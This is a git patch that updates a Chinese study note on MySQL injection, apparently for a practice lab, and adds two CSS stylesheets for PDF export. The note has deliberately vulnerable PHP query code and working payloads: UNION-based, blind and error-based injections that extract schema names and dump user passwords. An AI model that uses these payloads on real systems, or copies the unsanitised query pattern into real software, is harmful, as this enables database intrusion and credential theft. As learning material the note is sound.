From d477e843c23bac855de754827da99ae204eaa763 Mon Sep 17 00:00:00 2001 From: acevest Date: Fri, 9 Oct 2015 11:31:39 +0800 Subject: [PATCH] .... --- documents/MySQLInjection.md | 97 ++++--- learn/doc/GitHub2.Ace.css | 4 +- learn/doc/GitHub2.Ace.pdf.css | 307 ++++++++++++++++++++ learn/doc/night.Ace.pdf.css | 525 ++++++++++++++++++++++++++++++++++ 4 files changed, 899 insertions(+), 34 deletions(-) create mode 100755 learn/doc/GitHub2.Ace.pdf.css create mode 100644 learn/doc/night.Ace.pdf.css diff --git a/documents/MySQLInjection.md b/documents/MySQLInjection.md index 524d857..ed0f153 100644 --- a/documents/MySQLInjection.md +++ b/documents/MySQLInjection.md @@ -1,5 +1,5 @@ #MYSQL注入笔记 -##判断注入类型 +##数据库信息 设数据库```security```里有如下```users```表。 ``` @@ -13,44 +13,33 @@ mysql> desc users; +----------+-------------+------+-----+---------+----------------+ 3 rows in set (0.00 sec) ``` + +##构造注入SQL之一【GET - ErrorBased - IntegerBased】 +###1. 漏洞代码 + 大致PHP代码如下 ``` -"; - echo 'Your Password:' .$row['password']; - } else { - print_r(mysql_error()); - } +$id=$_GET['id']; +$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; +$result=mysql_query($sql); +$row = mysql_fetch_array($result); + +if($row) { + echo 'Your Login name:'. $row['username']; + echo "
"; + echo 'Your Password:' .$row['password']; } else { - echo "Please input the ID as parameter with numeric value"; + print_r(mysql_error()); } -?> ``` +通过提交```?id=1 AND 1=1```和```?id=1 AND 1=2```来判断 -###1. 文本型 -```SELECT * FROM users WHERE id='$id' LIMIT 0,1;``` - -提交```?id=1' AND '1'='1```和```?id=1' AND '1'='2```来判断。 -###2. 数字型 -```SELECT * FROM users WHERE id=$id LIMIT 0,1;``` - -提交```?id=1 AND 1=1```和```?id=1 AND 1=2```来判断。 -##构造注入SQL - -###1. 猜解字段数 +###2. 猜解字段数 通过``` UNION ALL SELECT NULL```中的```NULL```来猜解表的字段数,例如对于```users```表采用```SELECT *```的话就需要把SQL构造成``` UNION ALL SELECT NULL, NULL, NULL#```,如果采用```SELECT username, password```就只需要``` UNION ALL SELECT NULL, NULL#```就能判断出了。因此如果程序中写的不是```SELECT *```的话,猜解出来的字段数与实际可能不太一样。 -###1. 获取MySQL信息 +###3. 获取MySQL信息 如果想要获取数据库的一些信息可以利用已经显示出来的字段,在构造注入代码的时候将这些信息替换到已经显示的字段里。 @@ -82,7 +71,7 @@ if(isset($_GET['id'])) { +------+----------------+----------+ | id | username | password | +------+----------------+----------+ -| NULL | root@localhost | NULL | +| NULL | sqli@localhost | NULL | +------+----------------+----------+ 1 row in set (0.00 sec) ``` @@ -95,6 +84,48 @@ if(isset($_GET['id'])) { * 如果不能直接通过网页得到数据库数量,可以通过```1 AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),CHAR(32)) FROM information_schema.SCHEMATA),1,1)) > ord('1') ```来猜解。 * 猜解表名```1 AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0,1),1,1)) > ord('a')``` 当猜解的字母的值只有```>=0```成功时,表示该表名猜解完成。(其中```LIMIT x,y```中```x```表示从第几条记录开始查询,```y```表示最多要查询多少条记录)。通过变动```MID```和```LIMIT```的参数就可以把所有表名猜解完。 * 猜解表的字段数 ```-1 UNION ALL SELECT NULL, (SELECT COUNT(*) FROM information_schema.COLUMNS where table_name='users' AND table_schema='security'), NULL``` 或 ```-1 UNION ALL SELECT NULL, IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)), NULL FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND table_schema=CHAR(115,101,99,117,114,105,116,121)``` -* 逐个猜解字段 ```-1 UNION ALL SELECT NULL, CONCAT(column_name, ' ', column_type), NULL FROM information_schema.COLUMNS where table_name='users' AND table_schema='security' LIMIT 0,1``` 或 ```-1 UNION ALL SELECT NULL, NULL, CONCAT(IFNULL(CAST(column_name AS CHAR),CHAR(32)), ' ', IFNULL(CAST(column_type AS CHAR),CHAR(32))) FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND table_schema=CHAR(115,101,99,117,114,105,116,121) LIMIT 0,1``` -* 猜解记录数```-1 UNION ALL SELECT NULL, NULL, IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) FROM security.users``` -* 逐个获取字段```-1 UNION ALL SELECT NULL, NULL, CONCAT(IFNULL(CAST(id AS CHAR),CHAR(32)), ' ',IFNULL(CAST(username AS CHAR),CHAR(32)), ' ', IFNULL(CAST(password AS CHAR),CHAR(32))) FROM security.users LIMIT 0,1``` +* 逐个猜解字段 ```-1 UNION ALL SELECT NULL, CONCAT(column_name, ' ', column_type), NULL FROM information_schema.COLUMNS where table_name='users' AND table_schema='security' LIMIT 0,1 ``` 或 ```-1 UNION ALL SELECT NULL, CONCAT(IFNULL(CAST(column_name AS CHAR),CHAR(32)), ' ', IFNULL(CAST(column_type AS CHAR),CHAR(32))), NULL FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND table_schema=CHAR(115,101,99,117,114,105,116,121) LIMIT 0,1``` +* 猜解记录数```-1 UNION ALL SELECT NULL, IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)), NULL FROM security.users``` +* 逐个获取字段```-1 UNION ALL SELECT NULL, CONCAT(IFNULL(CAST(id AS CHAR),CHAR(32)), ' ',IFNULL(CAST(username AS CHAR),CHAR(32)), ' ', IFNULL(CAST(password AS CHAR),CHAR(32))), NULL FROM security.users LIMIT 0,1``` + +##构造注入SQL之二【GET - ErrorBased - SingleQuotes - String】 +###1.漏洞代码 +``` +$id=$_GET['id']; +$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; +$result=mysql_query($sql); +$row = mysql_fetch_array($result); + +if($row) { + echo 'Your Login name:'. $row['username']; + echo "
"; + echo 'Your Password:' .$row['password']; +} else { + print_r(mysql_error()); +} +``` + +###2.注入思路 +通过提交```?id=1' AND '1'='1```和```?id=1' AND '1'='2```来判断。 +其它与IntegerBased相似。如获取当前数据库的名字为```-1' UNION ALL SELECT NULL, DATABASE(), NULL AND '1'='``` + + +##构造SQL注入之三 +###1.漏洞代码 +``` +$id=$_GET['id']; +$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; +$result=mysql_query($sql); +$row = mysql_fetch_array($result); + +if($row) { + echo 'You are in...........'; +} +else { + print_r(mysql_error()); +} +``` +本代码的特点是不会在网页上输出任何字段值。 +###2.注入思路 +由于程序代码并不在网页上显示任何字段,因此我们如果想要得到数据库的一些信息得另外想办法。有一个方法是利用程序执行SQL时产生的错误会显示到网页上这一点,将要显示的信息嵌入错误信息里。对于MySQL利用的模板代码为```select count(*), CONCAT(CURRENT_USER(), FLOOR(RAND(0)*2)) x from information_schema.tables group by x;```会得到类似```ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 'group_key'```的错误提示。 + diff --git a/learn/doc/GitHub2.Ace.css b/learn/doc/GitHub2.Ace.css index ab20141..5860b73 100755 --- a/learn/doc/GitHub2.Ace.css +++ b/learn/doc/GitHub2.Ace.css @@ -248,7 +248,7 @@ span.float-right { code, tt { margin: 0 2px; padding: 0 5px; - white-space: nowrap; + white-space: wrap; border: 1px solid #eaeaea; background-color: #f8f8f8; border-radius: 3px; } @@ -259,6 +259,8 @@ pre code { white-space: pre; border: none; background: transparent; } +code { + font-size:9px; } .highlight pre { background-color: #f8f8f8; diff --git a/learn/doc/GitHub2.Ace.pdf.css b/learn/doc/GitHub2.Ace.pdf.css new file mode 100755 index 0000000..5860b73 --- /dev/null +++ b/learn/doc/GitHub2.Ace.pdf.css @@ -0,0 +1,307 @@ +body { + font-family: Helvetica, arial, sans-serif; + font-size: 14px; + line-height: 1.6; + padding-top: 10px; + padding-bottom: 10px; + background-color: white; + padding: 30px; } + +body > *:first-child { + margin-top: 0 !important; } +body > *:last-child { + margin-bottom: 0 !important; } + +a { + color: #4183C4; } +a.absent { + color: #cc0000; } +a.anchor { + display: block; + padding-left: 30px; + margin-left: -30px; + cursor: pointer; + position: absolute; + top: 0; + left: 0; + bottom: 0; } + +h1, h2, h3, h4, h5, h6 { + margin: 20px 0 10px; + padding: 0; + font-weight: bold; + -webkit-font-smoothing: antialiased; + cursor: text; + position: relative; } + +h1 { + text-align: center;} + +h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor { + background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA09pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoMTMuMCAyMDEyMDMwNS5tLjQxNSAyMDEyLzAzLzA1OjIxOjAwOjAwKSAgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OUM2NjlDQjI4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OUM2NjlDQjM4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo5QzY2OUNCMDg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo5QzY2OUNCMTg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PsQhXeAAAABfSURBVHjaYvz//z8DJYCRUgMYQAbAMBQIAvEqkBQWXI6sHqwHiwG70TTBxGaiWwjCTGgOUgJiF1J8wMRAIUA34B4Q76HUBelAfJYSA0CuMIEaRP8wGIkGMA54bgQIMACAmkXJi0hKJQAAAABJRU5ErkJggg==) no-repeat 10px center; + text-decoration: none; } + +h1 tt, h1 code { + text-align:center; + font-size: inherit; } + +h2 tt, h2 code { + font-size: inherit; } + +h3 tt, h3 code { + font-size: inherit; } + +h4 tt, h4 code { + font-size: inherit; } + +h5 tt, h5 code { + font-size: inherit; } + +h6 tt, h6 code { + font-size: inherit; } + +h1 { + font-size: 28px; + color: black; } + +h2 { + font-size: 24px; + border-bottom: 1px solid #cccccc; + color: black; } + +h3 { + font-size: 18px; } + +h4 { + font-size: 16px; } + +h5 { + font-size: 14px; } + +h6 { + color: #777777; + font-size: 14px; } + +p, blockquote, ul, ol, dl, li, table, pre { + margin: 15px 0; } + +p { + text-indent: 2em; +} + +hr { + background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0; + border: 0 none; + color: #cccccc; + height: 4px; + padding: 0; +} + +body > h2:first-child { + margin-top: 0; + padding-top: 0; } +body > h1:first-child { + margin-top: 0; + padding-top: 0; } + body > h1:first-child + h2 { + margin-top: 0; + padding-top: 0; } +body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child { + margin-top: 0; + padding-top: 0; } + +a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 { + margin-top: 0; + padding-top: 0; } + +h1 p, h2 p, h3 p, h4 p, h5 p, h6 p { + margin-top: 0; } + +li p.first { + display: inline-block; } +li { + margin: 0; } +ul, ol { + padding-left: 30px; } + +ul :first-child, ol :first-child { + margin-top: 0; } + +dl { + padding: 0; } + dl dt { + font-size: 14px; + font-weight: bold; + font-style: italic; + padding: 0; + margin: 15px 0 5px; } + dl dt:first-child { + padding: 0; } + dl dt > :first-child { + margin-top: 0; } + dl dt > :last-child { + margin-bottom: 0; } + dl dd { + margin: 0 0 15px; + padding: 0 15px; } + dl dd > :first-child { + margin-top: 0; } + dl dd > :last-child { + margin-bottom: 0; } + +blockquote { + border-left: 4px solid #dddddd; + padding: 0 15px; + color: #777777; } + blockquote > :first-child { + margin-top: 0; } + blockquote > :last-child { + margin-bottom: 0; } + +table { + padding: 0;border-collapse: collapse; } + table tr { + border-top: 1px solid #cccccc; + background-color: white; + margin: 0; + padding: 0; } + table tr:nth-child(2n) { + background-color: #f8f8f8; } + table tr th { + font-weight: bold; + border: 1px solid #cccccc; + margin: 0; + padding: 6px 13px; } + table tr td { + border: 1px solid #cccccc; + margin: 0; + padding: 6px 13px; } + table tr th :first-child, table tr td :first-child { + margin-top: 0; } + table tr th :last-child, table tr td :last-child { + margin-bottom: 0; } + +img { + max-width: 100%; } + +span.frame { + display: block; + overflow: hidden; } + span.frame > span { + border: 1px solid #dddddd; + display: block; + float: left; + overflow: hidden; + margin: 13px 0 0; + padding: 7px; + width: auto; } + span.frame span img { + display: block; + float: left; } + span.frame span span { + clear: both; + color: #333333; + display: block; + padding: 5px 0 0; } +span.align-center { + display: block; + overflow: hidden; + clear: both; } + span.align-center > span { + display: block; + overflow: hidden; + margin: 13px auto 0; + text-align: center; } + span.align-center span img { + margin: 0 auto; + text-align: center; } +span.align-right { + display: block; + overflow: hidden; + clear: both; } + span.align-right > span { + display: block; + overflow: hidden; + margin: 13px 0 0; + text-align: right; } + span.align-right span img { + margin: 0; + text-align: right; } +span.float-left { + display: block; + margin-right: 13px; + overflow: hidden; + float: left; } + span.float-left span { + margin: 13px 0 0; } +span.float-right { + display: block; + margin-left: 13px; + overflow: hidden; + float: right; } + span.float-right > span { + display: block; + overflow: hidden; + margin: 13px auto 0; + text-align: right; } + +code, tt { + margin: 0 2px; + padding: 0 5px; + white-space: wrap; + border: 1px solid #eaeaea; + background-color: #f8f8f8; + border-radius: 3px; } + +pre code { + margin: 0; + padding: 0; + white-space: pre; + border: none; + background: transparent; } +code { + font-size:9px; } + +.highlight pre { + background-color: #f8f8f8; + border: 1px solid #cccccc; + font-size: 13px; + line-height: 19px; + overflow: auto; + padding: 6px 10px; + border-radius: 3px; } + +pre { + background-color: #f8f8f8; + border: 1px solid #cccccc; + font-size: 13px; + line-height: 19px; + overflow: auto; + padding: 6px 10px; + border-radius: 3px; } + pre code, pre tt { + background-color: transparent; + border: none; } + +sup { + font-size: 0.83em; + vertical-align: super; + line-height: 0; +} +* { + -webkit-print-color-adjust: exact; +} +@media screen and (min-width: 914px) { + body { + width: 854px; + margin:0 auto; + } +} +@media print { + table, pre { + page-break-inside: avoid; + } + pre { + word-wrap: break-word; + } +} diff --git a/learn/doc/night.Ace.pdf.css b/learn/doc/night.Ace.pdf.css new file mode 100644 index 0000000..d093d45 --- /dev/null +++ b/learn/doc/night.Ace.pdf.css @@ -0,0 +1,525 @@ +html { + font-size: 16px; +} +html, +body { + -webkit-text-size-adjust: 100%; + -ms-text-size-adjust: 100%; + background: #363B40; +} +html, +body, +button, +input, +select, +textarea, +div.code-tooltip-content { + color: #b8bfc6; +} +div.code-tooltip, +.md-hover-tip .md-arrow:after { + background: #4B535A; +} +.popover.bottom > .arrow:after { + border-bottom-color: #4B535A; +} +html, +body, +button, +input, +select, +textarea { + font-style: normal; + line-height: 1.625rem; + font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; + -webkit-font-smoothing: antialiased; +} +hr { + height: 2px; + border: 0; + margin: 50px 0 !important; +} +h1, +h2, +h3, +h4, +h5, +h6 { + font-family: "Lucida Grande", "Corbal", Georgia, serif; + font-weight: normal; + clear: both; + -ms-word-wrap: break-word; + word-wrap: break-word; + margin: 0; + padding: 0; +} +h1 { + font-size: 2.25rem; + /* 36px */ + line-height: 2.5rem; + /* 40px */ + margin-bottom: 1.5rem; + /* 24px */ + letter-spacing: -1.5px; + text-align: center; +} +h2 { + font-size: 1.5rem; + /* 24px */ + line-height: 1.875rem; + /* 30px */ + margin-bottom: 1.5rem; + /* 24px */ + letter-spacing: -1px; +} +h3 { + font-size: 1.125rem; + /* 18px */ + line-height: 1.5rem; + /* 24px */ + margin-bottom: 1.5rem; + /* 24px */ + letter-spacing: -1px; +} +h4 { + font-size: 1rem; + /* 16px */ + line-height: 1.375rem; + /* 22px */ + margin-bottom: 1.5rem; + /* 24px */ +} +h5 { + font-size: 1rem; + /* 16px */ + line-height: 1.25rem; + /* 22px */ + margin-bottom: 1.5rem; + /* 24px */ +} +h6 { + font-size: 1rem; + /* 16px */ + line-height: 1rem; + /* 16px */ + margin-bottom: 0.75rem; + /* 12px */ + padding-bottom: 8px; + font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; + display: inline-block; + font-weight: bold; +} +a { + text-decoration: none; + outline: 0; +} +a:hover { + outline: 0; +} +a:focus { + outline: thin dotted; +} +p { + -ms-word-wrap: break-word; + word-wrap: break-word; + text-indent: 2em; +} +p, +ul, +dd, +ol, +hr, +address, +pre, +table, +iframe, +.wp-caption, +.wp-audio-shortcode, +.wp-video-shortcode { + margin-top: 0; + margin-bottom: 1.5rem; + /* 24px */ +} +audio:not([controls]) { + display: none; +} +[hidden] { + display: none; +} +::-moz-selection { + background: #4a89dc; + color: #fff; + text-shadow: none; +} +::selection { + background: #4a89dc; + color: #fff; + text-shadow: none; +} +ul, +ol { + padding: 0 0 0 1.875rem; + /* 30px */ +} +ul { + list-style: square; +} +ol { + list-style: decimal; +} +ul ul, +ol ol, +ul ol, +ol ul { + margin: 0; +} +b, +th, +dt, +strong { + font-weight: bold; +} +i, +em, +dfn, +cite { + font-style: italic; +} +blockquote { + padding-left: 1.875rem; + margin: 0 0 1.875rem 1.875rem; + border-left: solid 2px #474d54; + padding-left: 30px; + margin-top: 35px; +} +pre, +code, +kbd, +tt, +var { + background: rgba(0, 0, 0, 0.05); + font-size: 0.875rem; + font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; +} +pre.md-fences { + padding: 10px 30px; + margin-bottom: 20px; +} +code, +kbd, +tt, +var { + padding: 2px 0px; +} +code { + font-size:9px; +} +table { + max-width: 100%; + width: 100%; + border-collapse: collapse; + border-spacing: 0; +} +th, +td { + padding: 5px 10px; + vertical-align: top; +} +a { + -webkit-transition: all .2s ease-in-out; + transition: all .2s ease-in-out; +} +hr { + background: #474d54; + /* variable */ +} +#write>*:first-child { + margin-top: 40px; +} +h1 { + margin-top: 2em; +} +h1, +h2, +h3, +h4, +h5, +h6 { + color: #DEDEDE +} +h6 { + border-bottom: solid 2px #474d54; +} +a { + color: #e0e0e0; + text-decoration: underline; +} +a:hover { + color: #fff; +} +b, +th, +dt, +strong { + color: #DEDEDE; + /* variable */ +} +blockquote { + color: #9DA2A6; +} +table a { + color: #DEDEDE; + /* variable */ +} +th, +td { + border: solid 1px #474d54; + /* variable */ +} + +.task-list{ + padding-left: 0; +} + +.task-list-item{ + padding-left: 1.25rem; +} + +.task-list-item input{ + top: 0.1875rem; +} + +.task-list-item input:before { + content: ""; + display: inline-block; + width: 0.875rem; + height: 0.875rem; + vertical-align: middle; + text-align: center; + border: 1px solid #b8bfc6; + background-color: #363B40; + margin-top: -0.4375rem; +} +.task-list-item input:checked:before, +.task-list-item input[checked]:before{ + content: '\221A'; + /*◘*/ + font-size: 0.625rem; + line-height: 0.625rem; + color: #DEDEDE; +} + +.cm-s-default .cm-variable, +.cm-s-default .cm-operator, +.cm-s-default .cm-property { + color: #b8bfc6; +} +.cm-s-default .cm-keyword { + color: #C88FD0; +} +.cm-s-default .cm-tag { + color: #7DF46A; +} +.cm-s-default .cm-attribute { + color: #7575E4; +} +.CodeMirror div.CodeMirror-cursor { + border-left: 1px solid #b8bfc6; + z-index: 3; +} +.cm-s-default .cm-string { + color: #D26B6B; +} +.cm-s-default .cm-comment { + color: #DA924A; +} +.cm-s-default .cm-header, +.cm-s-default .cm-def { + color: #8d8df0; +} +.cm-s-default .cm-quote { + color: #57ac57; +} +.cm-s-default .cm-hr { + color: #d8d5d5; +} +.cm-s-default .cm-link { + color: #d3d3ef; +} +.cm-negative { + color: #d95050; +} +.cm-positive { + color: #50e650; +} +.cm-s-default .cm-string-2 { + color: #f50; +} +.cm-s-default .cm-meta, +.cm-s-default .cm-qualifier { + color: #b7b3b3; +} +.cm-s-default .cm-builtin { + color: #694ea7; +} +.cm-s-default .cm-bracket { + color: #997; +} +.cm-s-default .cm-atom { + color: #84B6CB; +} +.cm-s-default .cm-number { + color: #64AB8F; +} +.cm-s-default .cm-variable { + color: #b8bfc6; +} +.cm-s-default .cm-variable-2 { + color: #9FBAD5; +} +.cm-s-default .cm-variable-3 { + color: #1cc685; +} +.CodeMirror-selectedtext { + background: #4a89dc; + color: #fff !important; + text-shadow: none; +} +#write pre.md-meta-block { + border-bottom: 1px dashed #ccc; + background: transparent; + padding-bottom: 0.6em; + line-height: 1.2em; +} +.btn, +.btn .btn-default { + background: transparent; + color: #b8bfc6; +} +.md-table-edit { + border-top: 1px solid gray; +} +.popover-title { + background: transparent; +} +.md-image>.md-meta { + color: #BBBBBB; +} +.md-expand.md-image>.md-meta { + background:transparent; + color: #DDD; +} +#write>h3:before, +#write>h4:before, +#write>h5:before, +#write>h6:before { + border: none; + border-radius: 0px; + color: #888; + text-decoration: underline; + left: -1.875rem; +} +#write>h3.md-focus:before{ + top: 2px; +} +#write>h4.md-focus:before{ + top: 2px; +} + +.md-toc-item { + color: #A8C2DC; +} + +#write div.md-toc-tooltip { + background-color: #363B40; +} + +#outline-dropmenu .btn:hover, #outline-dropmenu .btn:focus, +.md-toc .btn:hover, .md-toc .btn:focus{ + color:white; +} + +#outline-dropmenu { + background: rgba(50, 54, 59, 0.93); + border: 1px solid rgba(253, 253, 253, 0.15); +} + +#outline-dropmenu .divider{ + background-color: #b8bfc6; +} + +.outline-expander:before { + top:2px; +} + +.pin-outline #outline-dropmenu { + background: inherit; + box-shadow: none; + border-right: 1px dashed; +} + +.pin-outline #outline-dropmenu:hover .outline-title-wrapper { + border-left:1px dashed; +} + +.outline-title-wrapper .btn { + color:inherit; +} + +.outline-item:hover { + border-color:#363B40; + background-color:#363B40; + color:white; +} +h1.md-focus .md-attr, h2.md-focus .md-attr, h3.md-focus .md-attr, h4.md-focus .md-attr, h5.md-focus .md-attr, h6.md-focus .md-attr, .md-hr .md-attr { + color: #8C8E92; + display: inline; +} + +.md-inline-math g, +.md-inline-math svg { + stroke: #b8bfc6 !important; + fill: #b8bfc6 !important; +} + +[md-inline='inline_math'] { + color: #9CB2E9; +} + +#math-inline-preview .md-arrow:after { + background: black; +} + +.modal-content { + background-color: #393739; +} + +.modal-footer { + border-top: 1px solid rgba(42, 6, 6, 0.36); +} + +.modal-header { + border-bottom: 1px solid rgba(42, 6, 6, 0.36); +} + +.modal-content input { + background-color: rgba(26, 21, 21, 0.51); + color: white; +} + +.modal-content .input-group-addon{ + background-color: rgba(0, 0, 0, 0.17); + color: white; +} + +.modal-backdrop { + background-color: rgba(174, 174, 174, 0.7); +} + +.modal-content .btn-primary { + border-color: #6dc1e7; +} + +.md-table-resize-popover { + background-color: #4B535A; +} -- 2.44.0